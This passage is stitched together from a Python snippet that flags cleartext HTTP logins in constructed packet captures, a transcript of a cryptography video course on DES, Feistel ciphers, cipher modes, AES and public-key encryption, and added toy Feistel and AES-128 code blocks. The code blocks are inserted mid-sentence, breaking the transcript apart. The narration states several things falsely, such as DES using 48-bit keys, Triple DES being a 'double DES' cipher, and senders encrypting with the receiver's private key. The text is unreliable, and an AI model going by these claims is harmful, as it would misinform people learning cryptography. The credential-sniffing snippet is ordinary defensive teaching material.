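            findings.append(Finding(dst, port, path, hits))
    return findings


# Constructed captures: a cleartext login, a plain GET, a TLS ClientHello
# fragment (unreadable by design), and a JSON API login on a non-standard port.
SAMPLE_PACKETS = [
    ("203.0.113.10", 80,
     b"POST /login HTTP/1.1\r\nHost: shop.example\r\n"
     b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 31\r\n\r\n"
     b"username=alice&password=hunter2"),
    ("203.0.113.10", 80,
     b"GET /index.html HTTP/1.1\r\nHost: shop.example\r\n\r\n"),
    ("203.0.113.20", 443,
     b"\x16\x03\x01\x00\xc8\x01\x00\x00\xc4\x03\x03\x9f\x1a\x00\x07\xff"),
    ("203.0.113.30", 8080,
     b"POST /api/session HTTP/1.1\r\nHost: api.example\r\n"
     b"Content-Type: application/json\r\n\r\n"
     b'{"user": "bob", "password": "s3cret"}'),
]

if __name__ == "__main__":
    for f in find_cleartext_credentials(SAMPLE_PACKETS):
        print(f"cleartext credential post to {f.dst}:{f.dst_port}{f.path} fields={f.fields}")
```

Running it reports the two POSTs (the form login on port 80 and the JSON login on port 8080) and nothing for the TLS record, because the analyser cannot read it at all. Note that the check is on whether the request is parseable as cleartext HTTP, not on the port number: a login API on port 8080 is just as exposed as one on port 80.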

transmits the secret key along with the cipher text, anyone can intercept the package and access the information. Consequently, this encryption category is termed private key cryptography, since a big part of the data's integrity is riding on the promise that the users can keep the key secret. This terminology contrasts with asymmetric key cryptography, which is called public key cryptography because it has two different keys at play, one of which is public.

Provided we manage to keep the keys secret, we still have to choose what kind of ciphers we want to use to encrypt this information. In symmetric key cryptography there are broadly two categories of ciphers that we can employ. Let us have a look. Stream ciphers are the algorithms that encrypt basic information one bit at a time. It can change depending on the algorithm being used, but usually it relies on a single bit or byte to do the encryption. This is a relatively quicker alternative, considering the algorithm doesn't have to deal with blocks of data at a single time. Every piece of data that goes into the encryption can and needs to be converted into binary format. In stream ciphers, each binary digit is encrypted one after the other. The most popular ones are RC4, Salsa and Panama. The binary data is passed through an encryption key, which is a randomly generated bitstream. Upon passing it through, we receive the cipher text that can be transferred to the receiver without fear of man-in-the-middle attacks. The binary data can be passed through an algorithmic function; it can have either XOR operations, as it is most of the time, or any other mathematical calculations that have the singular purpose of scrambling the data. The encryption key is generated using the random bitstream generator, and it acts as a supplement in the algorithmic function. The output is in binary form, which is then converted into the decimal or hexadecimal format to give our final cipher text. On the other hand, block ciphers dissect the raw information into
chunks of data of fixed size. The size of these blocks depends on the exact cipher being used. A 128-bit block cipher will break the plain text into blocks of 128 bits each and encrypt those blocks instead of a single digit. Once these blocks are encrypted individually, they are chained together to form the final cipher text. Block ciphers are much slower, but they are more tamperproof and are used in some of the most widely used algorithms employed today. Just like stream ciphers, the original cipher text is converted into binary format before beginning the process. Once the conversion is complete, the blocks are passed through the encryption algorithm along with the encryption key. This would provide us with the encrypted blocks of binary data. Once these blocks are combined, we get a final binary string. This string is then converted into hexadecimal format to get our cipher text. Today the most popular symmetric key algorithms, like AES, DES and 3DES, are all block cipher methodology subsets.

With so many factors coming into play, there are quite a few things symmetric key cryptography excels at while falling short in some others. Symmetric key cryptography is a much faster variant when compared to asymmetric cryptography. There is only one key in play, unlike asymmetric encryption, and this drastically improves calculation speed in the encryption and decryption. Similarly, the performance of symmetric encryption is much more efficient under similar computational limitations; fewer calculations help in better memory management for the whole system. Bulk amounts of data that need to be encrypted are very well suited for symmetric algorithms, since they are much quicker. Handling large amounts of data is simple and easy to use in servers and data farms; this helps in better latency during data recall and fewer mixed packets. Thanks to its simple single key structure, symmetric key cryptography algorithms are much easier to set up a communication channel with, and offer much more straightforward
maintenance duties. Once the secret key is transmitted to both the sender and receiver without any prior mishandling, the rest of the system aligns easily and everyday communication becomes easy and secure. If the algorithm is applied as per the documentation, symmetric algorithms are very robust and can encrypt vast amounts of data with very little overhead.

DES stands for Data Encryption Standard. It is a symmetric key cipher that is used to encrypt and decrypt information in a block-by-block manner. Each block is encrypted individually, and they're later chained together to form our final cipher text, which is then sent to a receiver. DES takes the original, unaltered piece of data, called the plain text, in a 64-bit block, and it is converted into an encrypted text that is called the cipher text. It uses 48-bit keys during the encryption process and follows a specific structure called the Feistel cipher structure during the entire process. It is a symmetric key algorithm, which means DES can reuse the keys used in the encryption format to decrypt the cipher text back to the original plain text. Once the 64-bit blocks are encrypted, they can be combined together before being transmitted.

Let's take a look at the origin and the reason DES was founded. DES is based on a Feistel block cipher called Lucifer, developed in 1971 by IBM cryptography researcher Horst Feistel. DES uses 16 rounds of this Feistel structure, using a different key for each round. It also utilizes a random function with two inputs and provides a single output variable. DES became the organization's approved encryption standard in November 1976 and was later reaffirmed as a standard in 1983, 1988 and finally in 1999. But eventually DES was cracked, and it was no longer considered a secure solution for all official routes of communication. Consequently, Triple DES was developed. Triple DES is a symmetric key block cipher that uses a double DES cipher: encrypt with the first key, decrypt with the second key, and encrypt again
with a third key. There is also a variation with two keys, where the first and second key are duplicates of each other. But Triple DES was ultimately deemed too slow for the growing need for fast communication channels, and people eventually fell back to using DES for encrypting messages. In order to search for a better alternative, a public competition was organized that helped cryptographers develop their own algorithm as a proposal for the next global standard. This is where the Rijndael algorithm came into play, and it was later credited to be the next Advanced Encryption Standard. For a long time DES was the standard for data encryption for data security. Its rule ended in 2002, when finally the Advanced Encryption Standard replaced DES as an acceptable standard following a public competition for a replacement.

To understand the structure of a Feistel cipher, you can use the following image as a reference. The block being encrypted is divided into two parts, one of which is being passed on to the function, while the other part is XORed with the function's output. The function also uses the encryption key, which differs for each individual round. This keeps going on until the last step, where the right-hand side and the left-hand side are swapped. Here we receive our final cipher text. For the decryption process, the entire procedure is reversed, starting from the order of the keys to the block sorting. If the entire process is repeated in reverse order, we will eventually get back our plain text, and this simplicity helps the speed overall. This was later detrimental to the efficiency of the algorithm; hence the security was compromised. A Feistel block cipher is a structure used to derive many symmetric block ciphers, such as DES, which we have discussed in our previous comment. The Feistel cipher proposed a structure that implements substitution and permutation alternately, so that we can obtain cipher text from the plain text and vice versa. This helps in reducing the redundancy of the
program and increases the complexity to combat brute force attacks. The Feistel cipher is actually based on the Shannon structure that was proposed in 1945. The Feistel cipher is the structure suggested by Horst Feistel, which was considered to be a backbone while developing many symmetric block ciphers. The Shannon structure highlights the implementation of alternate confusion and diffusion, and like we already discussed, the Feistel cipher structure can be completely reversed depending on the data. However, we must consider the fact that to decrypt the information by reversing the Feistel structure, we will need the exact polynomial functions and the key orders.

To understand how the blocks are being calculated, we take a plain text which is of 64 bits, and that is later divided into two equal halves of 32 bits each. In this, the right half is immediately transferred to the next round to become the new left half of the second round. The right half is again passed off to a function which uses an encryption key that is unique to each round in the Feistel cipher. Whatever the function gives off as an output is passed on as an XOR input with the left half of the initial plain text. The next output will become the right half of the second round for the plain text. This entire process constitutes a single round in the Feistel cipher. Taking into account what happens in a polynomial function, we take one half of the block and pass it through an expansion box. The work of the expansion box is to increase the size of the half from 32-bit to 48-bit text. This is done to make the text compatible with the 48-bit keys we have generated beforehand. Once we pass it through the XOR function, we get a 48-bit text as an output. Now remember, a half should be of 32 bits, so this 48-bit output is then later passed on to a substitution box. This substitution box reduces its size from a 48-bit to a 32-bit output, which is then later XORed with the first half of the plain text.

A block cipher is considered the safest if the size of the block
is large, but large block sizes can also slow down the encryption speed and the decryption speed. Generally the size is 64 bits; sometimes modern block ciphers like AES have a 128-bit block size as well. The security of the block cipher increases with increasing key size, but larger key sizes may also reduce the speed of the process. Earlier, 64-bit keys were considered sufficient; modern ciphers need to use 128-bit keys due to the increasing complexity of today's computational standards. The increasing number of rounds also increases the security of the block cipher; similarly, they are inversely proportional to the speed of encryption. A highly complex round function enhances the security of the block cipher, albeit we must maintain a balance between speed and security. The symmetric block cipher is implemented in a software application to achieve better execution speed; there is no use of an algorithm if it cannot be implemented in a real-life framework that can help organizations encrypt or decrypt the data in a timely manner.

Now that we understand the basics of Feistel ciphers, we can take a look at how DES manages to run through 16 rounds of this structure and provide the cipher text at the end. In simple terms, DES takes a 64-bit plain text and converts it into a 64-bit cipher text, and since we're talking about a symmetric algorithm, the same key is being used when it is decrypting the data as well. We first take a 64-bit clear plain text and we pass it through an initial permutation function. The initial permutation function has the job of dividing the block into two different parts, so that we can perform Feistel cipher structures on it. There are multiple rounds being procured in the DES algorithm, namely 16 rounds of Feistel cipher structure. Each of these rounds will need keys. Initially we take a 56-bit cipher key, but it is a single
key. We pass it on to a round key generator, which generates 16 different keys, one for each single round that the Feistel cipher is being run. These keys are passed on to the rounds as 48 bits. The size of these 48-bit keys is the reason we use the substitution and permutation boxes in the polynomial functions of the Feistel ciphers. When passing through all these rounds, we reach round 16, where the final key is passed on from the round key generator, and we get a final permutation. In the final permutation the halves are swapped, and we get our final cipher text. This is the entire process of DES, with 16 rounds of ciphers encompassed in it. To decrypt our cipher text back to the plain text, we just have to reverse the process we did in the DES algorithm and reverse the key order along with the functions. This kind of simplicity is what gave DES the bonus when it comes to speed, but eventually it was detrimental to the overall efficiency of the program when it comes to security factors.

DES has five different modes of operation to choose from. One of those is Electronic Code Book: each 64-bit block is encrypted and decrypted independently in the Electronic Code Book format. We also have Cipher Block Chaining, or the CBC method; here each 64-bit block depends on the previous one, and all of them use an initialization vector. We have a Cipher Feedback block mechanism, where the preceding cipher text becomes the input for the encryption algorithm; it produces a pseudo-random output, which in turn is XORed with the plain text. There is an Output Feedback method as well, which is the same as Cipher Feedback, except that the encryption algorithm input is the output from the preceding DES. A Counter method has a different approach, where each plain text block is XORed with an encrypted counter; the counter is then incremented for each subsequent block. There are a few other alternatives to these modes of operation, but the five mentioned above are the most widely used in the industry and
recommended by cryptographers worldwide.

Let's take a look at the future of DES. The dominance of DES ended in 2002, when the Advanced Encryption Standard replaced the DES encryption algorithm as the accepted standard. It was done following a public competition to find a replacement. NIST officially withdrew the global acceptance standard in May 2005, although Triple DES has been approved for some sensitive government information through 2030. NIST also had to change the DES algorithm because its key length was too short given the increased processing power of the new computers. Encryption power is related to the size of the key, and DES found itself a victim of ongoing technological advances in computing. We have reached a point where 56-bit was no longer a challenge to the computers of today. Note that because DES is no longer the NIST federal standard does not mean that it is no longer in use; Triple DES is still used today and is still considered a legacy encryption algorithm.

To get a better understanding of how these keys and cipher text look, we can use an online tool for our benefit. As we already know, to encrypt any kind of data a key is mandatory. This key can be generated using mathematical functions or a computerized key generation program, such as this website offers. It can be based on any piece of text; let's say the word is simply "learn" in our example. Once the key is settled, we provide the plain text, or the clear text, that needs to be encrypted using the aforementioned key. Suppose our sentence for this example is "this is my first message". We have satisfied two prerequisites: the message and the key. Another variable that comes into play is the mode of operation. We have already learned about five different modes of operation, while we can see some other options here as well. Let us go with the CBC variant, which basically means the Cipher Block Chaining method. One of CBC's key characteristics is that it uses a chaining process. It causes the decryption of a block of
cipher text to depend on all the preceding cipher text blocks. As a result, the entire validity of all the blocks is contained in the previous adjacent blocks as well. A single bit error in a cipher text block affects the decryption of all the subsequent blocks; rearrangement of the order of these, for example, can cause the decryption process to get corrupted. Regarding the manner of displaying binary information, we have two options here: we can either go with Base64 or the hexadecimal format. Let's go with Base64 right now. As you can see, the cipher text is readily available. Base64 is a little more efficient than hex, so we will be getting a smaller cipher text when it comes to Base64, albeit the size of both the formats will be the same. The hex has a longer cipher text, since Base64 takes four characters for every three bytes, while hex will take two characters for each byte; hence Base64 turns out to be more efficient. Now, to decrypt the cipher text we go by the same format: choose Base64, we copy the cipher text onto a decryption tool, and we have to make sure that the key we are using is exactly the same. We choose a similar mode of operation and we choose the correct encoding format as well, which is Base64 in this case. As you can see, the decryption is complete and we get the plain text back. Even if you keep everything the same but we just change the encoding format, it will not be able to decrypt anything.

Unfortunately, DES has become rather easy to crack even without the help of a key. The Advanced Encryption Standard is still on top when it comes to symmetric encryption security and will likely stay there for a while. Eventually, with so much computing power growth, the need for a stronger algorithm was necessary to safeguard our personal data. As solid as DES was, the computers of today could easily break the encryption with repeated attempts, thereby rendering the data security helpless. To counter this dilemma, a new standard was introduced, which was termed the Advanced Encryption Standard, or
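The Feistel round structure, the "decrypt by reversing the key order" property and the ECB, CBC and CTR modes described in the DES passages above, as one added example that is not the video's code and not DES itself. The block layout is DES-like (64-bit block, two 32-bit halves, 16 rounds, 48-bit round keys derived from a 56-bit key), but the key schedule and the round function F are made-up HMAC-based stand-ins so the whole thing fits on one screen; the sample key, plaintext, IV and nonce are constructed. The second half flips one ciphertext bit and measures how far the damage spreads on decryption in each mode, which is the chaining behaviour the CBC walkthrough talks about.

```python
"""Toy Feistel cipher with DES-like parameters, plus ECB, CBC and CTR modes.

Added example, not the video's code and not DES: F and the key schedule are
HMAC-based stand-ins (assumption), everything else is the real structure.
"""
import hmac

BLOCK = 8      # 64-bit block, as in DES
ROUNDS = 16


def key_schedule(key56: bytes) -> list:
    """16 round keys of 48 bits from a 56-bit key (stand-in for DES's PC-1/PC-2)."""
    assert len(key56) == 7, "56-bit key expected"
    return [hmac.new(key56, bytes([r]), "sha256").digest()[:6] for r in range(ROUNDS)]


def round_function(right: int, round_key: bytes) -> int:
    """F(R, K): keyed, non-invertible mixing of the 32-bit right half.  DES
    expands R to 48 bits, XORs K and compresses through S-boxes; a keyed
    hash plays that role here (assumption, not the DES F)."""
    digest = hmac.new(round_key, right.to_bytes(4, "big"), "sha256").digest()
    return int.from_bytes(digest[:4], "big")


def feistel(block: bytes, round_keys: list) -> bytes:
    """Rounds: L <- R, R <- L xor F(R, K_i); then the final swap of halves."""
    left = int.from_bytes(block[:4], "big")
    right = int.from_bytes(block[4:], "big")
    for rk in round_keys:
        left, right = right, left ^ round_function(right, rk)
    return right.to_bytes(4, "big") + left.to_bytes(4, "big")


def encrypt_block(block: bytes, key56: bytes) -> bytes:
    return feistel(block, key_schedule(key56))


def decrypt_block(block: bytes, key56: bytes) -> bytes:
    return feistel(block, key_schedule(key56)[::-1])   # same rounds, keys reversed


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def blocks(data: bytes) -> list:
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def ecb_encrypt(pt: bytes, key: bytes) -> bytes:
    return b"".join(encrypt_block(b, key) for b in blocks(pt))


def ecb_decrypt(ct: bytes, key: bytes) -> bytes:
    return b"".join(decrypt_block(b, key) for b in blocks(ct))


def cbc_encrypt(pt: bytes, key: bytes, iv: bytes) -> bytes:
    out, prev = [], iv
    for b in blocks(pt):
        prev = encrypt_block(xor(b, prev), key)        # C_i = E(P_i xor C_{i-1})
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(ct: bytes, key: bytes, iv: bytes) -> bytes:
    out, prev = [], iv
    for c in blocks(ct):
        out.append(xor(decrypt_block(c, key), prev))   # P_i = D(C_i) xor C_{i-1}
        prev = c
    return b"".join(out)


def ctr_crypt(data: bytes, key: bytes, nonce: bytes) -> bytes:
    """CTR: XOR with E(nonce || counter); the same call encrypts and decrypts."""
    out = []
    for n, b in enumerate(blocks(data)):
        out.append(xor(b, encrypt_block(nonce + n.to_bytes(4, "big"), key)))
    return b"".join(out)


SAMPLE_PLAINTEXT = b"BLOCK-00BLOCK-01BLOCK-02"   # constructed: three full blocks
SAMPLE_KEY = b"\x01\x23\x45\x67\x89\xab\xcd"      # constructed 56-bit key
IV = b"\x00" * BLOCK
NONCE = b"\x00" * 4


def bit_flip_damage(mode: str, key: bytes = SAMPLE_KEY) -> list:
    """Flip the top bit of ciphertext block 0, decrypt, and classify each
    recovered plaintext block as 'ok', 'one-bit' or 'garbled'."""
    if mode == "ECB":
        ct, dec = ecb_encrypt(SAMPLE_PLAINTEXT, key), lambda c: ecb_decrypt(c, key)
    elif mode == "CBC":
        ct, dec = cbc_encrypt(SAMPLE_PLAINTEXT, key, IV), lambda c: cbc_decrypt(c, key, IV)
    elif mode == "CTR":
        ct, dec = ctr_crypt(SAMPLE_PLAINTEXT, key, NONCE), lambda c: ctr_crypt(c, key, NONCE)
    else:
        raise ValueError(mode)
    damaged = bytearray(ct)
    damaged[0] ^= 0x80
    recovered = dec(bytes(damaged))
    report = []
    for got, want in zip(blocks(recovered), blocks(SAMPLE_PLAINTEXT)):
        flipped = sum(bin(x).count("1") for x in xor(got, want))
        report.append("ok" if flipped == 0 else "one-bit" if flipped == 1 else "garbled")
    return report


if __name__ == "__main__":
    for mode in ("ECB", "CBC", "CTR"):
        print(mode, bit_flip_damage(mode))
```

Two things to take from running it. First, `decrypt_block` is `feistel` with the same round function and the key list reversed; F is a one-way hash here and is never inverted, which is why a Feistel design can use any round function. Second, the damage report differs per mode: in ECB only the damaged block is lost; in CBC the damaged block is garbled and the next block gets exactly one flipped bit (it is `D(C_1) xor C_0`, and only `C_0` changed), after which decryption recovers; in CTR the flipped bit maps to a single flipped plaintext bit, which is why CTR-mode data needs a separate integrity check.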
the AES algorithm. Let's learn what the Advanced Encryption Standard is. The AES algorithm, also known as the Rijndael algorithm, is a symmetric block cipher with a block size of 128 bits. It is converted into cipher text using keys of 128, 192 or 256 bits. It is implemented in software and hardware throughout the world to encrypt sensitive data. The National Institute of Standards and Technology, also known as NIST, started development on AES in 1997, when it announced the need for an alternative to the Data Encryption Standard. The new internet needed a replacement for DES because of its small key size; with increasing computing power, it was considered unsafe against entire key search attacks. Triple DES was designed to overcome this problem; however, it was deemed to be too slow to be deployed in machines worldwide. Strong cases were presented by the MARS, RC6, Serpent and Twofish algorithms, but it was the Rijndael encryption algorithm, also known as AES, which was eventually chosen as the standard symmetric key encryption algorithm to be used. Its selection was formalized with the release of Federal Information Processing Standards Publication 197 in November of 2001, and it was approved by the US Secretary of Commerce.

Now that we understand the origin of AES, let us have a look at the features that make the AES encryption algorithm unique. The AES algorithm uses a substitution-permutation, or SP, network. It consists of multiple rounds to produce a cipher text. It has a series of linked operations, including replacing inputs with specific outputs, that is, substitutions, and others that involve bit shuffling, which is permutations. At the beginning of the encryption process we only start out with a single key, which can be either a 128-bit key, a 192-bit key or a 256-bit key. Eventually this one key is expanded to be used in multiple rounds throughout the encryption and the decryption cycle. Interestingly, AES performs all its calculations on byte data instead of bit data, as seen in the case of the
DES algorithm. Therefore, AES treats 128 bits of a clear text block as 16 bytes. The number of rounds during the encryption process depends on the key size that is being used: the 128-bit key size fixes 10 rounds, the 192-bit key size fixes 12 rounds, and the 256-bit key holds 14 rounds. A round key is required for each of these rounds, but since only one key is input into the algorithm, the single key needs to be expanded to get the key for each round, including round zero. With so many mathematical calculations going on in the background, there are bound to be a lot of steps throughout the procedure. Let's have a look at the steps followed in AES.

Before we move ahead, we need to understand how data is being stored during the process of AES encryption. Everything in the process is stored in a 4 × 4 matrix format. This matrix is also known as a state array, and we'll be using these state arrays to transmit data from one step to another and from one round to the next round. Each round takes a state array as input and gives a state array as output to be transferred into the next round. It is a 16-byte matrix, with each cell representing one byte and each four bytes representing a word, so every state array will have a total of four words representing it. As we previously discussed, we take a single key and expand it to the number of rounds that we need the key to be used in. Let's say the number of rounds is n; then the key has to be expanded to be used with n + 1 rounds, because the first round is the key zero round. Let's say n is the number of rounds; the key is expanded to n + 1 rounds. It is also a state array, having four words in its vicinity. Every key is used for a single round, and the first key is used as a round key before any round begins. In the very beginning, the plain text is captured and passed through an XOR function with the round key as a supplement; this key can be considered the first key from the n + 1 expanded set. Moving on, the state array resulting from the above
step is passed on to a byte substitution process. Beyond that, there is a provision to shift rows in the state arrays. Later on, the state array is mixed with a constant matrix to shuffle its columns in the mix columns segment, after which we add the round key for that particular round. The last four steps mentioned are part of every single round that the encryption algorithm goes through. The state arrays are then passed from one round to the next as an input. In the last round, however, we skip the mix columns portion, with the rest of the process remaining unchanged.

But what are these byte substitution and row shifting processes? Let's find out regarding each step in more detail. In the first step, the plain text is stored in a state array and is XORed with the K0, which is the first key in the expanded key set. This step is performed only once on a block, while being repeated at the end of each round as per iteration demands. The state array is XORed with the key to get a new state array, which is then passed over as input to the sub bytes process. In the second stage we have byte substitution. We leverage an S-box, called a substitution box, to randomly switch data among each element. Every single byte is converted into a hexadecimal value having two parts: the first part denotes the row value and the second part denotes the column value. The entire state array is passed through the S-box to create a brand new state array, which is then passed off as an input to the row shifting process. The 16 input bytes are replaced by looking at a fixed table given in the design; we finally get a matrix with four rows and four columns. When it comes to row shifting, each bit in the four rows of the matrix is shifted to the left; an entry that falls off is reinserted to the right of the line. The change is done as follows: the first line is not moved in any way, the second line is shifted a single position to the left, the third line is shifted two positions to the left, and the fourth line is shifted
three positions to the left. The result is a new matrix that contains the same 16 bytes, but they have been moved in relation to each other to boost the complexity of the program. In mix columns, each column of four bytes is now replaced using a special mathematical function. The function takes four bytes of a column as input and outputs four completely new bytes. We will get a new matrix with the same size of 16 bytes, and it should be noted that this phase is not done in the last round of the iteration. When it comes to adding a round key, the 16 bytes of the matrix are treated as 128 bits, and the 128 bits of the round key are XORed. If it is the last round, the output is the cipher text; if you still have a few rounds remaining, the resulting 128 bits are interpreted as 16 bytes and we start another similar round.

Let's take an example to understand how all these processes work. If our plain text is the string "Two One Nine Two", we first convert it into a hexadecimal format as follows. We use an encryption key, which is "that's my kung fu", and it is converted into a hexadecimal format as well. As per the guidelines, we use a single key, which is then later expanded into n + 1 keys, which in this case is supposed to be 11 keys for 10 different rounds. In round zero we add the round key: the plain text is XORed with the K0 and we get a state array that is passed off as an input to the substitution bytes process. When it comes to the substitution bytes process, we leverage an S-box to substitute the elements of each byte with a completely new byte. This way, the state array that we receive is passed off as an input to the row shifting process of the next step. When it comes to row shifting, each element is shifted a few places to the left, with the first row being shifted by zero places, the second row by one place, the third row by two places, and the last by three. The state array that we received from the row shifting is passed off as an input to mix columns. In mix columns we multiply the state array with a
constant matrix, after which we receive a new state array to be passed on to the next step. We add the new state array as an XOR with the round key of the particular iteration. Whatever state array we receive here, it becomes an output for this particular round. Now, since this is the first round of the entire encryption process, the state array that we receive is passed off as an input to the new round. We repeat this process for 10 more rounds and we finally receive a cipher text. Once the final state array can be denoted in the hexadecimal format, this becomes our final cipher text that we can use for transferring information between the sender and receiver.

Let's take a look at the applications of AES in this world. AES finds most use in the area of wireless security, in order to establish a secure mode of authentication between routers and clients. Highly secure mechanisms like WPA and WPA2-PSK are extensively used in securing Wi-Fi endpoints with the help of Rijndael's algorithm. It also helps in SSL/TLS encryption, which is instrumental in encrypting our internet browser sessions. AES works in tandem with other asymmetric encryption algorithms to make sure the web browser and web server are properly configured and use encrypted channels for communication. AES is also prevalent in general file encryption of various formats, ranging from documents to media files; having a large key allows people to encrypt media and decrypt data with the maximum security possible. AES is also used for processor security in hardware appliances, to prevent machine hijacking among other things.

As a direct successor to the DES algorithm, there are some aspects in which AES provides an immediate advantage. Let us take a look. When it comes to key length, the biggest flaw in the DES algorithm was its small length, which was easily vulnerable by today's standards. AES has managed to nab 128-, 192- and 256-bit key lengths to bolster the security further. The block size is also larger in AES, owing to more complexity of the
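The AES-128 round walkthrough above (state array, key expansion to 11 round keys, SubBytes, ShiftRows, MixColumns skipped in the last round, AddRoundKey), as an added example that is not the video's code and not a production implementation (real data belongs in a vetted library). The state is kept as 16 bytes in column-major order, which is the 4 × 4 state array the narration describes, and `aes128_trace` returns the state after round 0 and after each of the 10 rounds so the per-round progression can be followed. The S-box is computed from the GF(2^8) inverse and affine map rather than typed in; the demo at the bottom uses the textbook plaintext and key from the walkthrough, whose exact spelling is assumed.

```python
"""AES-128 round by round, keeping the state as the 4x4 'state array'.

Added example, not the video's code and not for production use.  State is
16 bytes in column-major order as FIPS-197 lays it out; round keys are the
11 blocks produced by the key expansion (round 0 to round 10).
"""


def gf_mul(a: int, b: int) -> int:
    """Multiply in GF(2^8) with the AES polynomial x^8 + x^4 + x^3 + x + 1."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a = (a << 1) ^ (0x11B if a & 0x80 else 0)
        b >>= 1
    return r


def _build_sbox() -> list:
    inverse = [0] * 256                       # multiplicative inverse, inv(0) := 0
    for a in range(1, 256):
        if not inverse[a]:
            for b in range(1, 256):
                if gf_mul(a, b) == 1:
                    inverse[a], inverse[b] = b, a
                    break
    sbox = []
    for x in inverse:                         # affine map: s = x ^ rotl(x,1..4) ^ 0x63
        s = x
        for _ in range(4):
            x = ((x << 1) | (x >> 7)) & 0xFF
            s ^= x
        sbox.append(s ^ 0x63)
    return sbox


SBOX = _build_sbox()
RCON = [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36]


def expand_key(key: bytes) -> list:
    """Expand a 16-byte key into 11 round keys of 16 bytes (round 0 to 10)."""
    assert len(key) == 16
    w = [list(key[i:i + 4]) for i in range(0, 16, 4)]
    for i in range(4, 44):
        t = list(w[i - 1])
        if i % 4 == 0:                        # RotWord, SubWord, Rcon every 4th word
            t = [SBOX[b] for b in t[1:] + t[:1]]
            t[0] ^= RCON[i // 4 - 1]
        w.append([w[i - 4][j] ^ t[j] for j in range(4)])
    return [bytes(sum(w[4 * r:4 * r + 4], [])) for r in range(11)]


def sub_bytes(s: list) -> list:
    return [SBOX[b] for b in s]


def shift_rows(s: list) -> list:
    """Row r of the state (bytes r, r+4, r+8, r+12) rotates left by r places."""
    return [s[r + 4 * ((c + r) % 4)] for c in range(4) for r in range(4)]


def mix_columns(s: list) -> list:
    """Each column is multiplied by the fixed matrix [2 3 1 1; 1 2 3 1; 1 1 2 3; 3 1 1 2]."""
    out = []
    for c in range(4):
        a0, a1, a2, a3 = s[4 * c:4 * c + 4]
        out += [gf_mul(a0, 2) ^ gf_mul(a1, 3) ^ a2 ^ a3,
                a0 ^ gf_mul(a1, 2) ^ gf_mul(a2, 3) ^ a3,
                a0 ^ a1 ^ gf_mul(a2, 2) ^ gf_mul(a3, 3),
                gf_mul(a0, 3) ^ a1 ^ a2 ^ gf_mul(a3, 2)]
    return out


def add_round_key(s: list, rk: bytes) -> list:
    return [b ^ k for b, k in zip(s, rk)]


def aes128_trace(key: bytes, block: bytes) -> list:
    """Hex state after round 0 (AddRoundKey only) and after rounds 1..10;
    the last entry is the ciphertext block."""
    assert len(block) == 16
    rks = expand_key(key)
    state = add_round_key(list(block), rks[0])
    trace = [bytes(state).hex()]
    for rnd in range(1, 11):
        state = shift_rows(sub_bytes(state))
        if rnd != 10:                         # the last round skips MixColumns
            state = mix_columns(state)
        state = add_round_key(state, rks[rnd])
        trace.append(bytes(state).hex())
    return trace


def aes128_encrypt_block(key: bytes, block: bytes) -> bytes:
    return bytes.fromhex(aes128_trace(key, block)[-1])


if __name__ == "__main__":
    # The textbook example the narration walks through (exact spelling assumed).
    key = b"Thats my Kung Fu"
    plaintext = b"Two One Nine Two"
    for rnd, state in enumerate(aes128_trace(key, plaintext)):
        print(f"round {rnd:2d}: {state}")
```

Because the code follows FIPS-197 exactly, it can be checked against the standard's own vectors: the Appendix C.1 key `000102…0f` with plaintext `00112233445566778899aabbccddeeff` must give `69c4e0d86a7b0430d8cdb78070b4c55a`, and the Appendix A.1 key expansion must produce `a0fafe17` as word 4. Both the S-box construction and `gf_mul` are also checked against the worked examples in the standard's section 4.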
algorithm. The number of rounds in DES is fixed irrespective of the plain text being used; in AES, the number of rounds depends on the key length that is being used for the particular iteration, thereby providing more randomness and complexity in the algorithm. The DES algorithm is considered to be simpler than AES, even though AES beats DES when it comes to the relative speed of encryption and decryption. This makes the Advanced Encryption Standard much more streamlined to be deployed in frameworks and systems worldwide when compared to the Data Encryption Standard.

Hello. In our last video on cryptography we took a look at symmetric key cryptography. We used a single private key for both the encryption and decryption of data, and it works very well in theory. Let’s take a look at a more realistic scenario now. Let’s meet Joe. Joe is a journalist who needs to communicate with Ryan via long-distance messaging. Due to the critical nature of the information, people are waiting for any message to leave Joe’s house so that they can intercept it. Now, Joe can easily use symmetric cryptography to send the encrypted data, so that even if someone intercepts the message they cannot understand what it says. But here’s the tricky part: how will Joe send the required decryption key to Ryan? The sender of the message as well as the receiver need to have the same decryption key so that they can exchange messages; otherwise Ryan cannot decrypt the information even when he receives the cipher text. If someone intercepts the key while it is being transmitted, there is no use in employing cryptography, since the third party can now decode all the information easily. Key sharing is a risk that will always exist when symmetric key cryptography is being used. Thankfully, asymmetric key encryption has managed to fix this problem. This is Baba from Simply Learn, and welcome to this video on asymmetric key cryptography. Let’s take a look at what we are going to learn today. We begin by explaining what asymmetric key cryptography is and how it works. We take a look at its applications and uses. We understand why it’s called public key cryptography, and then learn a little bit about RSA encryption, and then we learn about the advantages of asymmetric key cryptography over symmetric key cryptography.

Let’s understand what asymmetric key cryptography is. Asymmetric encryption uses a double layer of protection. There are two different keys at play here: a private key and a public key. A public key is used to encrypt the information pre-transit, and a private key is used to decrypt the data post-transit. This pair of keys must belong to the receiver of the message. The public keys can be shared via messaging, blog posts or key servers, and there are no restrictions. As you can see in the image, the two keys are working in the system. The sender first encrypts the message using the receiver’s private key, after which we receive the cipher text. The cipher text is then transmitted to the receiver without any other key. On getting the cipher text, the receiver uses his private key to decrypt it and get the plain text back. There has been no requirement of any key exchange throughout this process, therefore solving the most glaring flaw faced in symmetric key cryptography. The public key, known to everyone, cannot be used to decrypt the message, and the private key, which can decrypt the message, need not be shared with anyone. The sender and receiver can exchange personal data using the same set of keys as often as possible. To understand this better, take the analogy of your mailbox. Anyone who wants to send you a letter has access to the box and can easily share information with you. In a way, you can say the mailbox is publicly available to all, but only you have access to the key that can open the mailbox and read the letters in it. This is how the private key comes into play. No one can intercept the message and read its contents, since it’s encrypted. Once the receiver gets its contents, he can use his private key to decrypt the information. Both the public key and the private key are generated so that they are interlinked, and you cannot substitute other private keys to decrypt the data. In another example, if Alice wants to send a message to Bob, let’s say it reads “Call me today.”, she must use Bob’s public key while encrypting the message. Upon receiving the cipher message, Bob can proceed to use his private key in order to decrypt the message, and hence complete security is attained during transmission without any need for sharing the key.

